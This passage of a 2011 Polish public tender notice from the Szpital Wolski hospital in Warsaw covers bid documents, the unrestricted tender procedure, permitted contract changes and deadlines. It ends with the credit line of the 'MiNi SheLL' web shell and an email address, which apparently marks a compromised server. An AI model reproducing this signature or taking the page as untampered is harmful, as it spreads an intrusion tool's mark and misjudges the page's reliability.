d)	Załącznik nr 9 -  Oświadczenie o zapoznaniu się z miejscem i warunkami realizacji zamówienia.
e)	Kosztorysy ofertowe w wersji uproszczonej, wypełnione zgodnie z przedmiarami i specyfikacją  warunków technicznych wykonania i odbioru robót stanowiącymi załączniki  specyfikacji. 
f)	Harmonogram rzeczowo - finansowy  zawierający podział realizacji przedmiotu umowy na poszczególne etapy robót i terminy ich realizacji wraz z wynagrodzeniem za te etapy.
g) Oświadczenie Wykonawcy, że posiada certyfikat,deklarację zgodności na  zamontowane urządzenia a także oświadczenie, iż  przekaże  Zamawiającemu dokumenty potwierdzające to oświadczenie  w dniu  końcowego odbioru robót</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści  oferty, na podstawie której dokonano wyboru wykonawcy, jak niżej:
a)Harmonogram rzeczowo - finansowy może podlegać zmianom i modyfikacjom w trakcie realizacji robót. Potwierdzeniem wprowadzenia zmian i modyfikacji będzie podpisanie przez Strony umowy zamiennego lub zmodyfikowanego harmonogramu.
b)Zmiana osób, którym wykonawca zamierza powierzyć funkcję kierownika budowy lub kierownika robót wskazanych w wykazie osób, o którym mowa w pkt. 7.1 ), może nastąpić wyłącznie na zasadach i w trybie określonym w ustawie z dnia 7.7.1994 r. Prawo budowlane (t.j. Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), pod warunkiem że osoby te spełnią wymogi określone dla tych funkcji na etapie składania ofert.
c)Dopuszcza się możliwość wprowadzania robót zamiennych, w szczególności w przypadku:
a)konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
b)konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
c)Zakres rzeczowy zamówienia określony umową może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku:
d)zaistnienia trudności finansowych u Zamawiającego;
e)gdy wykonanie przedmiotu zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć;
f)gdy wykonanie przedmiotu zamówienia zgodnie z rozwiązaniami określonymi w dokumentacji projektowej i w przyjętym w niej zakresie, jest niezasadne z punktu widzenia ekonomicznego i gospodarczego;
e)Termin realizacji przedmiotu umowy, o którym mowa w pkt. 5, może ulec zmianie w przypadku:
g)wystąpienia robót dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego;
h)wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia, o którym mowa w ppkt d); 
i)wystąpienia warunków atmosferycznych lub klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia zgodnie z procesem technologicznym;
- przestojów spowodowanych koniecznością usuwania nieumyślnych uszkodzeń istniejących urządzeń podziemnych, nieoznaczonych w dokumentacji projektowej;
- wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy;
-konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 8 Sekcja zamówień publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2011 godzina 10:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 2 Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com